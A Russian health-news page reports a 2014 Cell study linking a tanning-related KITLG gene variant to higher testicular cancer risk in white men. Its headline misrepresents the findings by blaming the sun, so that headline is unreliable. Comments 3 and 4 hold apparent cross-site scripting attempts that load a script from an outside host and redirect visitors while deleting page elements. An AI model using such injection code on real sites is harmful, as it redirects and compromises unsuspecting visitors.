Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Оденьте мужа в паранджу и...  >>  Оденьте мужа в паранджу и защитите от солнца! Оно вызывает рак яичек!
 
Обратная связь
 

Оденьте мужа в паранджу и защитите от солнца! Оно вызывает рак яичек!

Размер шрифта
14 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Многие мужчины со светлой кожей могут быть благодарны своим генам – они защищают их от солнечных ожогов и способствуют получению красивого загара. Однако не все так безоблачно: как выяснили ученые, те же самые гены могут повысить вероятность развития рака яичек у этих мужчин.

Оденьте мужа в паранджу и защитите от солнца! Оно вызывает рак яичек!

Согласно исследованию ученых из Американского национального института здоровья и Университета Оксфорда в Англии, ген, играющий важную роль в загорании кожи, связан с повышенным риском рака яичек у белых мужчин. Около 80% белых мужчин являются носителями одной из форм этого гена, который вызывает повышение риска рака яичек более чем в три раза.

Исследование было опубликовано в журнале Cell. Оно является результатом анализа огромного количества данных, а также лабораторных экспериментов. Ученые предполагали,  что различные физиологические процессы с участием определенного гена могут оказывать как положительное, так и отрицательное влияние на здоровье человека.

«Вариации гена возникают естественным образом и могут становиться широко распространенными в популяции, если дают выгоду для здоровья человека», – рассказывает Дуглас Белл, автор работы и исследователь в Национальном институте наук о здоровье и окружающей среде. «Этот конкретный вариант гена может помочь людям со светлой кожей защитить ее от повреждений ультрафиолетом – таких как ожог или рак кожи, стимулируя процесс загара. Однако он позволяет стволовым клеткам яичек расти даже при наличии повреждения ДНК, когда они по идее должны прекратить расти и развиваться».

Белл объяснил, что белок р53 стимулирует процесс загара, когда ультрафиолетовые лучи активируют его в клетках кожи. После активации он присоединяется к определенному участку ДНК, расположенному в гене KITLG, который стимулирует выработку пигментных клеток – меланоцитов, обуславливающих загар.

Ксутинг Ван, соавтор и главный биоинформатик исследования, провел компьютерный интеллектуальный анализ данных. Ученые выбрали все возможные значимые для работы данные из 20 000 известных для р53 участков связывания в геноме, 10 миллионов наследственных генетических вариаций, выявленных в проекте по изучению генома, и 62 000 генетических вариаций,  связанных с развитием онкологических заболеваний у человека. «В конечном итоге, один из процессов, в которых участвует р53, был определенно связан с раком яичек, но к удивлению ученых он также играл положительную роль в связи с процессом загара», – отмечает Ван.

Группа ученых в Институте исследования рака в Университете Оксфорда, возглавляемая Гарретом Бондом, провела комплекс экспериментов для определения молекулярных механизмов, которые связывают этот вариант гена с развитием рака и загаром.
«Белые мужчины с одним измененным нуклеотидом в гене KITLG имеют наибольшие шансы развития рака яичек. В этом случае риск увеличивается от двух до трех раз», – говорит Бонд. «Высокая частота такого варианта гена у светлокожих людей может объяснить, почему рак яичек гораздо чаще встречается у людей европеоидной расы, нежели людей африканского происхождения».

Бонд также отмечает, что, хотя такой аллель гена и увеличивает риск рака яичек, он также может объяснить, почему опухоли яичек часто легко можно вылечить с помощью химиотерапии. «В случае большинства других опухолей существует мутация в гене р53, но в таких опухолях яичек р53 функционирует правильно. А большинство лекарств, используемых для лечения этих опухолей, действует совместно с р53, чтобы более эффективно уничтожать раковые клетки».

Современные исследования позволяют ученым не только лучше понять все генетические механизмы развития опухолей, но и как в этом случае – помогают определить группы риска и самые эффективные стратегии лечения.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

14 августа 2014 в 11:25

Цитировать   |   Пожаловаться

о своём, наболевшем,  какие проблемы...

2 - Поляков

14 августа 2014 в 14:56

Цитировать   |   Пожаловаться

Заголовок дня просто!)))

3 - zzzzzz

30 июня 2015 в 18:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:31

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   На что слетаются мухи? Оказывается, на рак!   Если рак груди вас не пугает, то уж лишний вес должен! Ген рака груди вызывает ожирение. Сдайте анализ прямо сейчас!  
23 июля 2013Из лысых крыс сделают лекарство от рака 09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить?
 
14 июня 2013Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Вы даже не знали, на какие места надо мазать солнцезащитный крем

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.